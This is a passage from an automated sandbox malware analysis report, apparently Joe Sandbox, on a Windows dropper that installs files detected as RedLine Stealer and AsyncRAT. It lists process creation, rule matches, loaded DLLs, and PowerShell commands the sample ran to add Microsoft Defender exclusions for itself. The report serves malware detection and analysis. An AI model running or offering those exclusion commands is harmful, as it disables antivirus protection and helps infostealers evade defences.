                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_0654D7B02_2_0654D7B0
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_065412102_2_06541210
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeCode function: 2_2_0654D2A82_2_0654D2A8
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B276F864_2_00007FFD9B276F86
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B277D324_2_00007FFD9B277D32
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B2785884_2_00007FFD9B278588
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B2737F24_2_00007FFD9B2737F2
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B2736554_2_00007FFD9B273655
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B3830E913_2_00007FFD9B3830E9
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe 3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: String function: 0041F84C appears 37 times
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: String function: 0041A250 appears 37 times
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: String function: 0041A860 appears 47 times
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1668539137.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
                            Source: Ekpb7jn7mf.exe, 00000000.00000002.1670344761.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1667476911.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameretest.exe4 vs Ekpb7jn7mf.exe
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs Ekpb7jn7mf.exe
                            Source: Ekpb7jn7mf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: YsrQekGS.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: YsrQekGS.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: YsrQekGS.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: YsrQekGS.exe.0.dr, Settings.csBase64 encoded string: 'OvIq3p/is46tW6jYGf6J298wGKVnNDD+Q2jMC9umDUXxUFGs+v2lXZqpyZYLPXWp', 'pxd6c+vbo7J2E6lUd3a2wKCIlIC2gxvRYuDZ7sQjEHLV31h+0MRraKVVx1LSrTHV'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/57@3/3
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004064DD GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_004064DD
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00419925 CoCreateInstance,0_2_00419925
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeMutant created: \Sessions\1\BaseNamedObjects\BjImkAWMcrtpfpkF
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6674281Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCommand line argument: sfxname0_2_0040FCFB
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCommand line argument: STARTDLG0_2_0040FCFB
                            Source: Ekpb7jn7mf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile read: C:\Windows\win.iniJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: tmpC5A4.tmp.2.dr, tmpC593.tmp.2.dr, tmpC582.tmp.2.dr, tmpC572.tmp.2.dr, tmpC594.tmp.2.dr, tmpC5A5.tmp.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: Ekpb7jn7mf.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile read: C:\Users\user\Desktop\Ekpb7jn7mf.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\Ekpb7jn7mf.exe "C:\Users\user\Desktop\Ekpb7jn7mf.exe"
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe"
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe"
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: aclayers.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: riched32.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: ieframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: mlang.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: twinui.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: mrmcorer.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: bcp47mrm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: windows.ui.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: windowmanagementapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: inputhost.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: aclayers.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
